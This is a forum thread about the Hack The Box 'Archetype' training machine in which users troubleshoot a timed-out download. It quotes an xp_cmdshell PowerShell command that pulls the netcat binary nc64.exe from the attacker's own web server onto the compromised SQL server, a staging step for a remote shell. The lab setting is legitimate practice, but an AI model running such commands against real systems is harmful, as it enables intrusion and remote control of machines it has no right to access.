Archetype wget not working

HTB Content Machines
, ,
1

Hey,

I have the following problem:
I’ve been trying to solve the Archetype machine for hours now.
As soon as I enter the wget command in the machine, I get the "10.129.2.31 - - [06/Jan/2023 14:25:02] “GET /nc64.exe HTTP/1.1” 200 -
" on my Python Http server log. But the command takes forever to execute. After a few minutes I get this message:
SQL> xp_cmdshell powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.15.232/nc64.exe -outfile nc64.exe; dir

output

wget : The operation has timed out.

At line:1 char:33

  • … vc\Downloads; wget http://10.10.15.232/nc64.exe -outfile nc.exe; dir

  •                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    • CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc

    eption

    • FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

NULL

NULL

Directory: C:\Users\sql_svc\Downloads

NULL

NULL

Mode LastWriteTime Length Name

-a---- 1/6/2023 5:14 AM 0 nc64.exe

NULL

NULL

NULL

Soft/Hard reset I have already tried.
I know a little bit about Powershell, but I don’t understand why it doesn’t work like this.

Would be happy about further input.
Thank you!

2

It sounds like the web request isn’t getting to your http server. Double check ip address, port, and firewall rules. UFW tends to be a common one.

1 Like
3

As mentioned before, I can see the Request on the Python http server log… and when I visit my ip in browser I can download the file too.

5

Having the same issue. Definitely not firewall. Can confirm in my Kali VM I have an IP within the same subnet as the Archetype box. I can confirm I have the HTTP server running from the right folder. Just not sure how to fix the wget : Unable to connect to the remote server error. Weird how I can connect to the target machine via SQL but the same machine can’t talk back to my machine…?

6

@NeonPinguin & @aaron00204 are you using openvpn over tcp or udp?

Download the tcp one instead of the udp one and this issue should be solved.

Greetings
Cibans

7

sorry for the late reply, no that does not fix anything.

8

guys all you need to do is put the nc64.exe to the folder directory of impacket. Heres mine

Screenshot_2023-11-15_16_20_57
Screenshot_2023-11-15_16_20_571920×1080 323 KB